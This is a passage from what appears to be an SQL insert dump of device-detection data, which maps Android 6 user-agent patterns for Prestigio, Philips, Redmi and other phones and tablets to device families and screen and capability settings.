Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; PSP3512DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; PSP3527DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; PSP3528DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; PSP3533DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; PSP5530DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; PSP7501DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; PSP7511DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; PacificE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Panasonic ELUGA Tapp) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Pearl) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Pelitt T1 PLUS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Phantom6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Phantom6-Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Phantom6S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Philips X588) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_philips','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Philips X818) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_philips','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Philips Xenium V787) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_philips','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Philips_X586) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_philips','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Picasso 4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Platinum 4.0) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Plus E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Pocket) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Point_X501) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Poppox P3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Power Five Max) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Power Ice Max) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Power Rage Evo) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Power) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Prime_Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Pure XR) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Q-Smart_Elite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Q5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Q6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Q7S5IN4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Q7S5IN4GP) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; QC-704GA) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; QMobile E1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_qmobile','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; QMobile I8i) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_qmobile','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; QMobile i6 Metal ONE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_qmobile','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; QUANTUM_470_RUGGED_PRO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; QUANTUM_4_550) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Quantum Fly) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Quantum MUV PRO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; R1 HD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; R1 PLUS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; R50A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; R50B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; R6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; RAINBOW) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; RIVIERA U963) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; RLTP5567) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ROBBY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; RS500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; RX550) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Razar) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Razar_Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Redmi 3S) AppleWebKit/* (KHTML, like Gecko) Chrome','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Redmi 3S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Redmi 3X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Redmi 4) AppleWebKit/* (KHTML, like Gecko) Chrome','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Redmi 4) AppleWebKit/* (KHTML, like Gecko) Chrome (lite) Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Redmi 4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Redmi 4A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Redmi 4X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Redmi Note 3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Redmi Note 4) AppleWebKit/* (KHTML, like Gecko) Chrome','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Redmi Note 4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Redmi Note 4X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Redmi Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Reiv 500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; S10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; S11) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; S12) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; S2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; S20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; S20+ Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; S3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; S30) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; S4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; S4Z) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; S5062 Duo) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; S50D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; S5E_NXT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; S6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 